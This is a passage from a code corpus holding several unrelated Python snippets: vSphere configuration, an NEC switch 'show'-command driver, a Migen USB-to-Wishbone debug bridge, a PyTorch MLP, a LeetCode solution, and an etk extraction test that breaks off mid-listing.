self.datacenter = datacenter
self.domain = domain
self.pools = pools
self.network = network
self.node_template = node_template
self.master_config = master_config
self.worker_config = worker_config
self.vault_address = vault_address
@classmethod
def from_config(cls, config: Dict[str, Any]):
dc = vsphere.get_datacenter(config['datacenter'])
# Build resource pools
pools = []
for pool in config['pools']:
pools.append(ResourcePool.from_config(dc, pool))
return Environment(
name=config['name'],
datacenter=dc,
domain=config['domain'],
pools=pools,
network=Network(
network_id=str(vsphere.get_network(dc.id, name=config['network']['name']).id),
subnet=ipaddress.ip_network(config['network']['subnet']),
dns_servers=config['network']['dns_servers'],
domains=config['network']['domains']
),
node_template=vsphere.get_virtual_machine(dc.id, name=config['template']),
master_config=NodeSettings(
name=config['node']['master']['name'],
network_offset=config['node']['master']['network_offset'],
cpus=config['node']['master']['cpus'],
memory=config['node']['master']['memory']
),
worker_config=NodeSettings(
name=config['node']['worker']['name'],
network_offset=config['node']['worker']['network_offset'],
cpus=config['node']['worker']['cpus'],
memory=config['node']['worker']['memory']
),
vault_address=config['vault_address']
)
| StarcoderdataPython |
1754403 | <filename>vdibroker/api/v1/views/session_view.py<gh_stars>10-100
# Copyright 2017 Cloudbase Solutions, SRL.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
def _format_session(req, session, keys=None):
def transform(key, value):
if keys and key not in keys:
return
yield (key, value)
return dict(itertools.chain.from_iterable(
transform(k, v) for k, v in session.items()))
def single(req, session):
return {"session": _format_session(req, session)}
def collection(req, sessions):
formatted_sessions = [_format_session(req, m)
for m in sessions]
return {'sessions': formatted_sessions}
| StarcoderdataPython |
24810 | <reponame>securedataplane/preacher
class NEC:
def __init__( self ):
self.prompt = '(.*)'
self.timeout = 60
def show(self, *options, **def_args ):
'''Possible Options :[' access-filter ', ' accounting ', ' acknowledgments ', ' auto-config ', ' axrp ', ' cfm ', ' channel-group ', ' clock ', ' config-lock-status ', ' cpu ', ' dhcp ', ' dot1x ', ' dumpfile ', ' efmoam ', ' environment ', ' file ', ' flash ', ' gsrp ', ' history ', ' igmp-snooping ', ' interfaces ', ' ip ', ' ip-dual ', ' ipv6-dhcp ', ' license ', ' lldp ', ' logging ', ' loop-detection ', ' mac-address-table ', ' mc ', ' memory ', ' mld-snooping ', ' netconf ', ' netstat ', ' ntp ', ' oadp ', ' openflow ', ' port ', ' power ', ' processes ', ' qos ', ' qos-flow ', ' sessions ', ' sflow ', ' spanning-tree ', ' ssh ', ' system ', ' tcpdump ', ' tech-support ', ' track ', ' version ', ' vlan ', ' vrrpstatus ', ' whoami ']'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ip(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ip "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_mc(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show mc "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_cfm(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show cfm "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ntp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ntp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ssh(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ssh "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_qos(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show qos "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_cpu(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show cpu "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_vlan(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show vlan "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_lldp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show lldp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dhcp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dhcp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_axrp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show axrp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_oadp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show oadp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_gsrp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show gsrp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_port(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show port "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_file(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show file "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_power(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show power "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_clock(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show clock "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dot1x(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dot1x "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_sflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show sflow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_track(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show track "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_flash(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show flash "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_system(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show system "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_whoami(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show whoami "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_efmoam(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show efmoam "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_memory(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show memory "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_tcpdump(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show tcpdump "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_history(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show history "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_logging(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show logging "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_license(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show license "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_netstat(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show netstat "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_version(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show version "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_netconf(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show netconf "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ipdual(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ip-dual "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_sessions(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show sessions "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_qosflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show qos-flow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_openflow(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show openflow "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_dumpfile(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show dumpfile "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ipv6dhcp(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ipv6-dhcp "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_processes(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show processes "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_vrrpstatus(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show vrrpstatus "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_interfaces(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show interfaces "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_environment(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show environment "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_autoconfig(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show auto-config "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_techsupport(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show tech-support "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_mldsnooping(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show mld-snooping "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_igmpsnooping(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show igmp-snooping "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_channelgroup(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show channel-group "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_spanningtree(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show spanning-tree "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_loopdetection(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show loop-detection "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_acknowledgments(self, *options, **def_args ):
'''Possible Options :[' interface ']'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show acknowledgments "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_macaddresstable(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show mac-address-table "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_configlockstatus(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show config-lock-status "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_acknowledgments_interface(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show acknowledgments interface "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
| StarcoderdataPython |
10937 | <filename>src/models/layers/feature.py
import torch
import torch.nn as nn
class MLP(nn.Module):
def __init__(self, num_features, hidden_sizes, dropout):
super().__init__()
self.layers = nn.ModuleList(
[nn.Linear(num_features, hidden_sizes[0])] +
[nn.Linear(hidden_sizes[i], hidden_sizes[i + 1]) for i in range(len(hidden_sizes) - 1)]
)
self.activation = nn.ReLU()
self.dropout = nn.Dropout(p=dropout)
def forward(self, x):
for layer in self.layers:
x = layer(x)
x = self.activation(x)
x = self.dropout(x)
return x | StarcoderdataPython |
1747135 | <filename>valentyusb/usbcore/cpu/usbwishbonebridge.py<gh_stars>10-100
from migen import *
from migen.genlib.misc import chooser, WaitTimer
from migen.genlib.record import Record
from migen.genlib.fsm import FSM, NextState
from litex.soc.interconnect import wishbone
from litex.soc.interconnect import stream
from ..pid import PID, PIDTypes
class USBWishboneBridge(Module):
def __init__(self, usb_core, clk_freq=12000000, magic_packet=0x43):
self.wishbone = wishbone.Interface()
# # #
byte_counter = Signal(3, reset_less=True)
byte_counter_reset = Signal()
byte_counter_ce = Signal()
self.sync += \
If(byte_counter_reset,
byte_counter.eq(0)
).Elif(byte_counter_ce,
byte_counter.eq(byte_counter + 1)
)
# Unlike the UART or Ethernet bridges, we explicitly only
# support two commands: reading and writing. This gets
# integrated into the USB protocol, so it's not really a
# state. 1 is "USB Device to Host", and is therefore a "read",
# while 0 is "USB Host to Device", and is therefore a "write".
cmd = Signal(1, reset_less=True)
cmd_ce = Signal()
# Instead of self.source and self.sink, we let the wrapping
# module handle packing and unpacking the data.
self.sink_data = Signal(8)
# True when the "sink" value has data
self.sink_valid = Signal()
self.send_ack = Signal()
# Indicates whether a "debug" packet is currently being processed
self.n_debug_in_progress = Signal()
address = Signal(32, reset_less=True)
address_ce = Signal()
data = Signal(32, reset_less=True)
rx_data_ce = Signal()
tx_data_ce = Signal()
self.sync += [
If(cmd_ce, cmd.eq(usb_core.data_recv_payload[7:8])),
If(address_ce, address.eq(Cat(address[8:32], usb_core.data_recv_payload))),
If(rx_data_ce,
data.eq(Cat(data[8:32], usb_core.data_recv_payload))
).Elif(tx_data_ce,
data.eq(self.wishbone.dat_r)
)
]
fsm = ResetInserter()(FSM(reset_state="IDLE"))
self.submodules += fsm
fsm.act("IDLE",
self.n_debug_in_progress.eq(1),
If(usb_core.data_recv_put,
If(usb_core.tok == PID.SETUP,
If(usb_core.endp == 0,
# If we get a SETUP packet with a "Vendor" type
# going to this device, treat that as a DEBUG packet.
cmd_ce.eq(1),
byte_counter_reset.eq(1),
If(usb_core.data_recv_payload[0:7] == magic_packet,
NextState("RECEIVE_ADDRESS"),
).Else(
# Wait for the end of the packet, to avoid
# messing with normal USB operation
NextState("WAIT_PKT_END"),
),
)
)
)
)
# The target address comes as the wValue and wIndex in the SETUP
# packet. Once we get that data, we're ready to do the operation.
fsm.act("RECEIVE_ADDRESS",
If(usb_core.data_recv_put,
byte_counter_ce.eq(1),
If((byte_counter >= 1),
If((byte_counter <= 4),
address_ce.eq(1),
),
),
),
# We don't need to explicitly ACK the SETUP packet, because
# they're always acknowledged implicitly. Wait until the
# packet ends (i.e. until we've sent the ACK packet) before
# moving to the next state.
If(usb_core.end,
byte_counter_reset.eq(1),
If(cmd,
NextState("READ_DATA")
).Else(
NextState("RECEIVE_DATA")
),
),
)
fsm.act("RECEIVE_DATA",
# Set the "ACK" bit to 1, so we acknowledge the packet
# once it comes in, and so that we're in a position to
# receive data.
If(usb_core.endp == 0,
self.send_ack.eq(1),
If(usb_core.data_recv_put,
rx_data_ce.eq(1),
byte_counter_ce.eq(1),
If(byte_counter == 3,
NextState("WAIT_RECEIVE_DATA_END"),
byte_counter_reset.eq(1)
).Elif(usb_core.end,
# NextState("WAIT_SEND_ACK_START"),
NextState("WRITE_DATA"),
byte_counter_reset.eq(1)
)
)
)
)
fsm.act("WAIT_RECEIVE_DATA_END",
self.send_ack.eq(1),
# Wait for the end of the USB packet, if
# it hasn't come already.
If(usb_core.end,
# NextState("WAIT_SEND_ACK_START")
NextState("WRITE_DATA")
)
)
self.comb += [
# Trim off the last two bits of the address, because wishbone addresses
# are word-based, and a word is 32-bits. Therefore, the last two bits
# should always be zero.
self.wishbone.adr.eq(address[2:]),
self.wishbone.dat_w.eq(data),
self.wishbone.sel.eq(2**len(self.wishbone.sel) - 1)
]
fsm.act("WRITE_DATA",
byte_counter_reset.eq(1),
self.wishbone.stb.eq(1),
self.wishbone.we.eq(1),
self.wishbone.cyc.eq(1),
If(self.wishbone.ack | self.wishbone.err,
NextState("WAIT_SEND_ACK_START"),
)
)
fsm.act("READ_DATA",
byte_counter_reset.eq(1),
self.wishbone.stb.eq(1),
self.wishbone.we.eq(0),
self.wishbone.cyc.eq(1),
If(self.wishbone.ack | self.wishbone.err,
tx_data_ce.eq(1),
NextState("SEND_DATA_WAIT_START")
)
)
fsm.act("SEND_DATA_WAIT_START",
byte_counter_reset.eq(1),
If(usb_core.start,
NextState("SEND_DATA"),
),
)
self.comb += \
chooser(data, byte_counter, self.sink_data, n=4, reverse=False)
fsm.act("SEND_DATA",
If(usb_core.endp == 0,
# Keep sink_valid high during the packet, which indicates we have data
# to send. This also causes an "ACK" to be transmitted.
self.sink_valid.eq(1),
If(usb_core.data_send_get,
byte_counter_ce.eq(1),
),
If(byte_counter == 4,
NextState("WAIT_SEND_ACK_START")
),
If(usb_core.end,
NextState("WAIT_SEND_ACK_START")
)
).Else(
NextState("SEND_DATA_WAIT_START"),
)
)
# To validate the transaction was successful, the host will now
# send an "IN" request. Acknowledge that by setting
# self.send_ack, without putting anything in self.sink_data.
fsm.act("WAIT_SEND_ACK_START",
If(usb_core.endp == 0,
self.send_ack.eq(1),
If(usb_core.retry,
byte_counter_reset.eq(1),
NextState("SEND_DATA"),
).Elif(usb_core.start,
NextState("WAIT_PKT_END_DBG"),
)
)
)
fsm.act("WAIT_PKT_END_DBG",
self.send_ack.eq(1),
If(usb_core.end,
NextState("IDLE"),
)
)
fsm.act("WAIT_PKT_END",
self.n_debug_in_progress.eq(1),
If(usb_core.end,
NextState("IDLE"),
)
) | StarcoderdataPython |
1621438 | import numpy as np
def get_phaselc(t, p, data, v_num):
return 1.+p.amp1[v_num]*np.cos(2.*np.pi*(t-p.theta1[v_num])/p.per[v_num]) + p.amp2[v_num]*np.cos(4.*np.pi*(t-p.theta2[v_num])/p.per[v_num])
| StarcoderdataPython |
3399460 | #
# @lc app=leetcode id=572 lang=python3
#
# [572] Subtree of Another Tree
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def isSubtree(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return self.compare(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)
def compare(self, s, t):
if not s and not t:
return True
if not s or not t:
return False
return s.val == t.val and self.compare(s.right, t.right) and self.compare(s.left, t.left)
# @lc code=end
| StarcoderdataPython |
3366877 | <gh_stars>0
# -*- coding: utf-8 -*-
import unittest
import sys, os
sys.path.append('../../')
from etk.core import Core
import json
import codecs
class TestExtractionsInputPaths(unittest.TestCase):
def setUp(self):
file_path = os.path.join(os.path.dirname(__file__), "ground_truth/1_content_extracted.jl")
self.doc = json.load(codecs.open(file_path))
def test_invalid_json_path(self):
doc = {
"url": "http:www.hitman.org",
"doc_id": "19B0EAB211CD1D3C63063FAB0B2937043EA1F07B5341014A80E7473BA7318D9E",
"actors": {
"name": "agent 47",
"affiliation": "International Contract Agency"
}
}
e_config = {
"document_id": "doc_id",
"data_extraction": [
{
"input_path": [
"actors["
],
"fields": {
"actors": {
"extractors": {
"create_kg_node_extractor": {
"config": {
"segment_name": "actor_information"
}
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
with self.assertRaises(Exception):
r = c.process(doc)
def test_extraction_input_path(self):
women_name_file_path = os.path.join(os.path.dirname(__file__), "resources/female-names.json.gz")
e_config = {"document_id": "doc_id",
"resources": {
"dictionaries": {
"women_name": women_name_file_path
}
},
"data_extraction": [
{
"input_path": "*.*.text.`parent`"
,
"fields": {
"name": {
"extractors": {
"extract_using_dictionary": {
"config": {
"dictionary": "women_name",
"ngrams": 1,
"joiner": " ",
"pre_process": [
"x.lower()"
],
"pre_filter": [
"x"
],
"post_filter": [
"isinstance(x, basestring)"
]
},
"extraction_policy": "keep_existing"
},
"extract_using_regex": {
"config": {
"include_context": "true",
"regex": "(?:my[\\s]+name[\\s]+is[\\s]+([-a-z0-9@$!]+))",
"regex_options": [
"IGNORECASE"
],
"pre_filter": [
"x.replace('\\n', '')",
"x.replace('\\r', '')"
]
},
"extraction_policy": "replace"
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
r = c.process(self.doc)
self.assertTrue("content_extraction" in r)
self.assertTrue("content_strict" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_strict"])
self.assertTrue("content_relaxed" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_relaxed"])
self.assertTrue("title" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens" in r["content_extraction"]["title"])
self.assertTrue("knowledge_graph" in r)
self.assertTrue("name" in r["knowledge_graph"])
expected = [
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
